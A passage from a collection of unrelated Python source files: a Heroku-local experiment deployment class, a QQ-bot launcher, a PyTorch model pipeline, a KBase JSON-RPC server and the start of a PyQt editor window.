Press Ctrl+C to exit.".format(base_url)) self.out.log("Launching the experiment...") try: result = _handle_launch_data( "{}/launch".format(base_url), error=self.out.error, attempts=1 ) except Exception: # Show output from server self.dispatch[r"POST /launch"] = "launch_request_complete" heroku.monitor(listener=self.notify) else: if result["status"] == "success": self.out.log(result["recruitment_msg"]) dashboard_url = "{}/dashboard/".format(get_base_url()) self.display_dashboard_access_details(dashboard_url) if not self.no_browsers: self.open_dashboard(dashboard_url) self.heroku = heroku self.out.log( "Monitoring the Heroku Local server for recruitment or completion..." ) heroku.monitor(listener=self.notify) def launch_request_complete(self, match): return HerokuLocalWrapper.MONITOR_STOP def cleanup(self): self.out.log("Completed debugging of experiment with id " + self.exp_id) self.complete = True def new_recruit(self, match): """Dispatched to by notify(). If a recruitment request has been issued, open a browser window for the a new participant (in this case the person doing local debugging). 
""" self.out.log("new recruitment request!") if self.no_browsers: self.out.log(recruiters.NEW_RECRUIT_LOG_PREFIX + ": " + match.group(1)) return url = match.group(1) if self.proxy_port is not None: self.out.log("Using proxy port {}".format(self.proxy_port)) url = url.replace(str(get_config().get("base_port")), self.proxy_port) open_browser(url) def display_dashboard_access_details(self, url): config = get_config() self.out.log("Experiment dashboard: {}".format(url)) self.out.log( "Dashboard user: {} password: {}".format( config.get("dashboard_user"), config.get("dashboard_password"), ) ) def open_dashboard(self, url): config = get_config() self.out.log("Opening dashboard") parsed = list(urlparse(url)) parsed[1] = "{}:{}@{}".format( config.get("dashboard_user"), config.get("dashboard_password"), parsed[1], ) open_browser(urlunparse(parsed)) def recruitment_closed(self, match): """Recruitment is closed. Start a thread to check the experiment summary. """ if self.no_browsers: self.out.log(recruiters.CLOSE_RECRUITMENT_LOG_PREFIX) if self.status_thread is None: self.status_thread = threading.Thread(target=self.check_status) self.status_thread.start() def check_status(self): """Check the output of the summary route until the experiment is complete, then we can stop monitoring Heroku subprocess output. """ self.out.log("Recruitment is complete. Waiting for experiment completion...") base_url = get_base_url() status_url = base_url + "/summary" while not self.complete: time.sleep(10) try: resp = requests.get(status_url) exp_data = resp.json() except (ValueError, requests.exceptions.RequestException): self.out.error("Error fetching experiment status.") else: self.out.log("Experiment summary: {}".format(exp_data)) if exp_data.get("completed", False): self.out.log("Experiment completed, all nodes filled.") self.complete = True self.heroku.stop() def notify(self, message): """Monitor output from heroku process. 
This overrides the base class's `notify` to make sure that we stop if the status-monitoring thread has determined that the experiment is complete. """ if self.complete: return HerokuLocalWrapper.MONITOR_STOP return super(DebugDeployment, self).notify(message) class LoaderDeployment(HerokuLocalDeployment): dispatch = {"Replay ready: (.*)$": "start_replay"} def __init__(self, app_id, output, verbose, exp_config): self.app_id = app_id self.out = output self.verbose = verbose self.exp_config = exp_config or {} self.original_dir = os.getcwd() self.zip_path = None def configure(self): self.exp_config.update({"mode": "debug", "loglevel": 0}) self.zip_path = data.find_experiment_export(self.app_id) if self.zip_path is None: msg = 'Dataset export for app id "{}" could not be found.' raise IOError(msg.format(self.app_id)) def setup(self): self.exp_id, self.tmp_dir = setup_experiment( self.out.log, app=self.app_id, exp_config=self.exp_config ) def execute(self, heroku): """Start the server, load the zip file into the database, then loop until terminated with <control>-c. """ db.init_db(drop_all=True) self.out.log( "Ingesting dataset from {}...".format(os.path.basename(self.zip_path)) ) data.ingest_zip(self.zip_path) base_url = get_base_url() self.out.log("Server is running on {}. Press Ctrl+C to exit.".format(base_url)) if self.exp_config.get("replay"): self.out.log("Launching the experiment...") time.sleep(4) _handle_launch_data("{}/launch".format(base_url), error=self.out.error) heroku.monitor(listener=self.notify) # Just run until interrupted: while self.keep_running(): time.sleep(1) def start_replay(self, match): """Dispatched to by notify(). If a recruitment request has been issued, open a browser window for the a new participant (in this case the person doing local debugging). 
""" self.out.log("replay ready!") url = match.group(1) open_browser(url) def cleanup(self): self.out.log("Terminating dataset load for experiment {}".format(self.exp_id)) def keep_running(self): # This is a separate method so that it can be replaced in tests return True
main.py
# Application entry point: start the HTTP API and the Bilibili monitor as
# background daemon threads, then run the QQ-bot loop in the main thread.
from Util.config import config
from api import app
import threading
from qqbot import bili_monitor, start_qqbot_loop
from rule import update_rules, update_keywords_list
import logging
from gevent.pywsgi import WSGIServer

# Timestamped, message-only log lines for every module using `logging`.
logging.basicConfig(
    level=logging.INFO, format="%(asctime)s - %(message)s", datefmt="%Y-%m-%d %H:%M:%S"
)


def run_flask():
    """Serve the Flask `app` on the configured port via gevent's WSGI server."""
    server = WSGIServer(("", config["api"]["port"]), app, log=app.logger)
    server.serve_forever()


if __name__ == "__main__":
    # Load the rule set and keyword list before any thread starts using them.
    update_rules()
    update_keywords_list()
    # Daemon threads die with the main thread, so the process can exit cleanly.
    threading.Thread(target=run_flask, daemon=True).start()
    threading.Thread(target=bili_monitor, daemon=True).start()
    start_qqbot_loop()
    # NOTE(review): presumably start_qqbot_loop() blocks forever; if it ever
    # returns, this wait keeps the daemon threads alive — confirm the intent.
    threading.Event().wait()
PipeLine.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2019, Linear Labs Technology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import torch, yajl as json
from multiprocessing import Process
from torch import nn

from ..Common.Compiler import Compile
from ..Common.utils import StrOrDict as sod
from ..RabbitMQ.Host import worker


def _build_model(spec):
    """Build one pipeline stage from its config entry.

    A string is treated as the path of a JSON model description and compiled
    with ``Compile``; anything else (a nested dict) becomes a nested
    ``ParallelPipe``.
    """
    if isinstance(spec, str):
        # Use a context manager so the config file handle is closed
        # (the original leaked it via open(...).read()).
        with open(spec, 'r') as fh:
            return Compile(json.loads(fh.read()))
    return ParallelPipe(spec)


class DummyClass:
    """Identity stage: returns its input unchanged (a no-op pipe)."""

    def __init__(self):
        pass

    def __call__(self, x):
        return x


class ParallelPipe:
    """A set of named models that all receive the same input.

    ``cfg`` maps a name to either a JSON model-config path or a nested dict.
    Calling the pipe runs every model on the same input and returns either a
    dict keyed by model name (``as_dict=True``, the default) or a plain list
    of outputs in insertion order.
    """

    def __init__(self, cfg, as_dict=True):
        cfg = sod(cfg)  # accept a dict, a path, or a JSON string
        self.models = {}
        self.as_dict = as_dict
        self.no_grad = False  # toggled by train()/eval()
        for name, spec in cfg.items():
            self.models[name] = _build_model(spec)

    def load(self, files):
        """Load state dicts for the named models from ``files`` (name -> path).

        Unknown names are silently ignored so one mapping can serve several
        pipes.
        """
        for name, path in files.items():
            if name in self.models:
                self.models[name].load_state_dict(torch.load(path))

    def train(self):
        """Put every model in training mode and re-enable gradients."""
        self.no_grad = False
        for model in self.models.values():
            model.train()

    def eval(self):
        """Put every model in eval mode and disable gradient tracking."""
        self.no_grad = True
        for model in self.models.values():
            model.eval()

    def _forward(self, x):
        # Every model sees the same input ``x``.
        outputs = {name: model(x) for name, model in self.models.items()}
        return outputs if self.as_dict else list(outputs.values())

    def __call__(self, x):
        if self.no_grad:
            # BUG FIX: the original wrote ``toch.no_grad()`` — a NameError
            # that crashed every eval-mode call.
            with torch.no_grad():
                return self._forward(x)
        return self._forward(x)

    def __str__(self):
        import texttable as tt
        tab = tt.Texttable()
        tab.header(list(self.models.keys()))
        # NOTE(review): add_row() receives (name, model) pairs, one per
        # header column; kept as-is to preserve the original rendering —
        # confirm this is the intended table layout.
        tab.add_row(self.models.items())
        return tab.draw()

    def __repr__(self):
        return self.__str__()


class Pipe:
    """A sequential pipeline of named models applied in configuration order.

    Every key except ones containing "Load" maps to a model config (path or
    nested dict, as in ``ParallelPipe``). An optional "Load" section maps
    model names to state-dict files restored at construction time.
    """

    def __init__(self, cfg):
        cfg = sod(cfg)
        self.cfg = cfg
        self.order = []   # call order == insertion order of cfg
        self.models = {}
        self.no_grad = False
        for name, spec in cfg.items():
            if "Load" in name:
                continue  # weight-loading section, handled below
            self.order.append(name)
            self.models[name] = _build_model(spec)
        if "Load" in cfg:
            for name, path in cfg['Load'].items():
                try:
                    self.models[name].load_state_dict(torch.load(path))
                except Exception:
                    # Nested ParallelPipe stages expose .load() instead of
                    # load_state_dict(); fall back to it (narrowed from the
                    # original bare ``except:``).
                    self.models[name].load(cfg['Load'])

    def train(self):
        """Put every stage in training mode and re-enable gradients."""
        self.no_grad = False
        for name in self.order:
            self.models[name].train()

    def eval(self):
        """Put every stage in eval mode and disable gradient tracking."""
        self.no_grad = True
        for name in self.order:
            self.models[name].eval()

    def __call__(self, x):
        """Feed ``x`` through each stage in order; return the final output."""
        if self.no_grad:
            with torch.no_grad():
                for name in self.order:
                    x = self.models[name](x)
        else:
            for name in self.order:
                x = self.models[name](x)
        return x

    def __str__(self):
        import texttable as tt
        parts = []
        # One single-column table per stage, concatenated vertically.
        for name, model in self.models.items():
            tab = tt.Texttable()
            tab.header([name])
            tab.add_row([model])
            parts.append(tab.draw() + '\n')
        return ''.join(parts)


class PipeLine(nn.Module):
    """Container chaining Pipe/ParallelPipe stages, optionally served from a
    RabbitMQ work queue by a pool of worker processes."""

    backend = 'rmq'  # currently the only supported queue backend

    def __init__(self, cfg=None):
        super(PipeLine, self).__init__()
        self.pipes = []
        self.threads = []   # actually multiprocessing.Process workers
        self.running = False
        if cfg:
            self.cfg = sod(cfg)

    def __exit__(self, exc_type, exc_value, traceback):
        self.close()

    def __str__(self):
        return ''.join(str(pipe) + '\n' for pipe in self.pipes)

    def __repr__(self):
        return self.__str__()

    def close(self):
        """Join and close all worker processes started by run()."""
        if self.running:
            for proc in self.threads:
                proc.join()
                proc.close()
            self.running = False

    def __call__(self, x):
        # In-process execution: chain the registered pipes directly.
        for pipe in self.pipes:
            x = pipe(x)
        return x

    def run(self):
        """Spawn ``cfg['threads']`` worker processes consuming ``cfg['queue']``
        at ``cfg['addr']``; each worker runs the registered pipes."""
        self.running = True
        self.threads = []
        if self.backend == 'rmq':
            for _ in range(self.cfg['threads']):
                proc = Process(
                    target=worker,
                    args=(self.cfg['addr'], self.cfg['queue'], self.pipes),
                )
                self.threads.append(proc)
                proc.start()

    def register_pipes(self, pipes):
        """Register several pipes at once (see register_pipe)."""
        for pipe in pipes:
            self.register_pipe(pipe)

    def register_pipe(self, pipe):
        """Append a Pipe/ParallelPipe to the chain; returns self for chaining."""
        assert isinstance(pipe, (Pipe, ParallelPipe)), \
            'the pipe you want to add to the PipeLine is not a Pipe!'
        self.pipes.append(pipe)
        return self
ContigCountServer.py
#!/usr/bin/env python from wsgiref.simple_server import make_server import sys import json import traceback import datetime from multiprocessing import Process from getopt import getopt, GetoptError from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\ JSONRPCError, ServerError, InvalidRequestError from os import environ from ConfigParser import ConfigParser from biokbase import log import biokbase.nexus import requests as _requests import urlparse as _urlparse import random as _random import os DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'ContigCount'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from ContigCount.ContigCountImpl import ContigCount impl_ContigCount = ContigCount(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) sync_methods = {} async_run_methods = {} async_check_methods = {} async_run_methods['ContigCount.count_contigs_async'] = ['ContigCount', 'count_contigs'] async_check_methods['ContigCount.count_contigs_check'] = ['ContigCount', 'count_contigs'] sync_methods['ContigCount.count_contigs'] = True class AsyncJobServiceClient(object): def __init__(self, timeout=30 * 60, token=None, ignore_authrc=True, trust_all_ssl_certificates=False): url = environ.get('KB_JOB_SERVICE_URL', None) if url is None and config is not None: url = config.get('job-service-url') if url is None: raise ValueError('Neither \'job-service-url\' parameter is 
defined in '+ 'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system') scheme, _, _, _, _, _ = _urlparse.urlparse(url) if scheme not in ['http', 'https']: raise ValueError(url + " isn't a valid http url") self.url = url self.timeout = int(timeout) self._headers = dict() self.trust_all_ssl_certificates = trust_all_ssl_certificates if token is None: raise ValueError('Authentication is required for async methods') self._headers['AUTHORIZATION'] = token if self.timeout < 1: raise ValueError('Timeout value must be at least 1 second') def _call(self, method, params, json_rpc_call_context = None): arg_hash = {'method': method, 'params': params, 'version': '1.1', 'id': str(_random.random())[2:] } if json_rpc_call_context: arg_hash['context'] = json_rpc_call_context body = json.dumps(arg_hash, cls=JSONObjectEncoder) ret = _requests.post(self.url, data=body, headers=self._headers, timeout=self.timeout, verify=not self.trust_all_ssl_certificates) if ret.status_code == _requests.codes.server_error: if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json': err = json.loads(ret.text) if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, ret.text) else: raise ServerError('Unknown', 0, ret.text) if ret.status_code != _requests.codes.OK: ret.raise_for_status() resp = json.loads(ret.text) if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'] def run_job(self, run_job_params, json_rpc_call_context = None): return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0] def check_job(self, job_id, json_rpc_call_context = None): return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0] class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. 
Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = ServerError() newerr.trace = traceback.format_exc() newerr.data = e.__str__() raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. """ rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. 
self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if self.method_data[request['method']].has_key('types'): # @IgnorePep8 self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): 
self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'ContigCount' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_ContigCount.count_contigs, name='ContigCount.count_contigs', types=[basestring, basestring]) self.method_authentication['ContigCount.count_contigs'] = 'required' self.auth_client = biokbase.nexus.Client( config={'server': 'nexus.api.globusonline.org', 'verify_ssl': True, 'client': None, 'client_secret': None}) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = 
int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]} try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] if method_name in async_run_methods: method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1] if method_name in async_check_methods: method_name = async_check_methods[method_name][0] + "." 
+ async_check_methods[method_name][1] auth_req = self.method_authentication.get(method_name, "none") if auth_req != "none": if token is None and auth_req == 'required': err = ServerError() err.data = "Authentication required for " + \ "ContigCount but no authentication header was passed" raise err elif token is None and auth_req == 'optional': pass else: try: user, _, _ = \ self.auth_client.validate_token(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception, e: if auth_req == 'required': err = ServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) method_name = req['method'] if method_name in async_run_methods or method_name in async_check_methods: if method_name in async_run_methods: orig_method_pair = async_run_methods[method_name] else: orig_method_pair = async_check_methods[method_name] orig_method_name = orig_method_pair[0] + '.' 
+ orig_method_pair[1] if 'required' != self.method_authentication.get(orig_method_name, 'none'): err = ServerError() err.data = 'Async method ' + orig_method_name + ' should require ' + \ 'authentication, but it has authentication level: ' + \ self.method_authentication.get(orig_method_name, 'none') raise err job_service_client = AsyncJobServiceClient(token = ctx['token']) if method_name in async_run_methods: run_job_params = { 'method': orig_method_name, 'params': req['params']} if 'rpc_context' in ctx: run_job_params['rpc_context'] = ctx['rpc_context'] job_id = job_service_client.run_job(run_job_params) respond = {'version': '1.1', 'result': [job_id], 'id': req['id']} rpc_result = json.dumps(respond, cls=JSONObjectEncoder) status = '200 OK' else: job_id = req['params'][0] job_state = job_service_client.check_job(job_id) finished = job_state['finished'] if finished != 0 and 'error' in job_state and job_state['error'] is not None: err = {'error': job_state['error']} rpc_result = self.process_error(err, ctx, req, None) else: respond = {'version': '1.1', 'result': [job_state], 'id': req['id']} rpc_result = json.dumps(respond, cls=JSONObjectEncoder) status = '200 OK' elif method_name in sync_methods or (method_name + '_async') not in async_run_methods: self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' else: err = ServerError() err.data = 'Method ' + method_name + ' cannot be run synchronously' raise err except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception, e: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print 'The request method was %s\n' % 
environ['REQUEST_METHOD'] # print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8 # print 'The request body was: %s' % request_body # print 'The result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] if 'error' not in error['error'] or error['error']['error'] is None: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. 
# This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print "Monkeypatching std libraries for async" from gevent import monkey monkey.patch_all() uwsgi.applications = { '': application } except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. 
This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print "Listening on port %s" % port if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user, _, _ = application.auth_client.validate_token(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception, e: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError 
as err: # print help information and exit: print str(err) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print "Host set to %s" % host else: assert False, "unhandled option" start_server(host=host, port=port) # print "Listening on port %s" % port # httpd = make_server( host, port, application) # # httpd.serve_forever()
mainwindow.py
# -*- coding: utf-8 -*- from util.profiler import pf_point, pf_end import html import json import os import re import runpy import sys import tempfile import threading from datetime import datetime import numpy as np import pygments.styles from PyQt5.QtGui import * from matplotlib.axes import Axes from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.figure import Figure from matplotlib.ticker import AutoLocator, LinearLocator import pyqode.python.backend import util.code import util.html from algo.stmts import * from lang import translator from maths.nodes import * from maths.parser import quick_parse as parse from pyqode.core import api from pyqode.core import modes from pyqode.core import panels from util import first_found_dir from util import theming, show_error from util.widgets import * translate = QCoreApplication.translate class AppState(): current_file: Optional[str] = None can_save = False autosave_timer: QTimer = None mode_python = False app_started = False algo = BlockStmt([]) new_version = False async_import_table = {} def async_import(module): def runner(): globals()[module] = __import__(module) async_import_table[module] = threading.Thread(target=runner, args=()) async_import_table[module].start() def async_imported(module): return not async_import_table[module].is_alive() class GuiState(): window: QMainWindow = None ui = None code_editor: api.CodeEdit = None plot_canvas: FigureCanvas = None plot_figure: Figure = None plot_axes: Axes = None panel_search: panels.SearchAndReplacePanel = None syntax_highlighter: modes.PygmentsSyntaxHighlighter = None algo_base_font: QFont = None editor_action_table = [ ("Copy", "copy"), ("Cut", "cut"), ("Paste", "paste"), ("Undo", "undo"), ("Redo", "redo"), ("SelectAll", "select_all"), ("DuplicateLine", "duplicate_line"), ("Indent", "indent"), ("Unindent", "un_indent"), ("GoToLine", "goto_line"), ("Find", "Search"), ("Replace", "ActionSearchAndReplace"), ("FindPrevious", 
"FindPrevious"), ("FindNext", "FindNext"), ("ZoomIn", "zoom_in"), ("ZoomOut", "zoom_out"), ("ResetZoom", "reset_zoom") ] python_only = [ "SelectAll", "Find", "FindPrevious", "FindNext", "Replace", "Indent", "Unindent", "GoToLine" ] algo_only = [ "Debug", "Step", "ConvertToPython" ] filters = {} lng_actions = {} item_map = {} root_item: QTreeWidgetItem = None mode_zoom: modes.ZoomMode = None mode_ext_select: modes.ExtendedSelectionMode = None panel_folding: panels.FoldingPanel = None article_load_widgets = None class ExecState(): stop_flag = False running = False run_started: datetime = None skip_step = False stopped = False last_saved = None current_stmt: BaseStmt = None python_stopped = False recent_actions = None recent_buttons = None article_buttons = None article_list = None current_output = "" after_output = "" user_input: str = None worker = None block_html = lambda: '<span style="color:%s;font-weight:bold">' % theming.algo_colors[0] comment_html = lambda: '<span style="color:%s;font-style:italic">' % theming.algo_colors[1] keyword_html = lambda: '<span style="color:%s;font-weight:bold">' % theming.algo_colors[2] red_html = lambda: '<span style="color:%s">' % theming.algo_colors[3] label_format = "&nbsp;<span>%s</span>" + "&nbsp;" * 10 def sleep(duration): begin = datetime.datetime.now() while (datetime.datetime.now() - begin).total_seconds() < duration: check_stop() QCoreApplication.processEvents() def sleep_seconds(duration): sleep(float(duration)) plot_update() def is_empty(): if AppState.mode_python: return not GuiState.code_editor.toPlainText() else: return AppState.algo.children == [] def is_modified(): if AppState.mode_python: return GuiState.code_editor.toPlainText() != ExecState.last_saved else: return repr(AppState.algo) != ExecState.last_saved def handler_ClearRecent(): util.settings.setValue("recent", json.dumps([])) recent_update_text() def recent_add(path): recent = json.loads(util.settings.value("recent", "[]")) recent.insert(0, path) recent = 
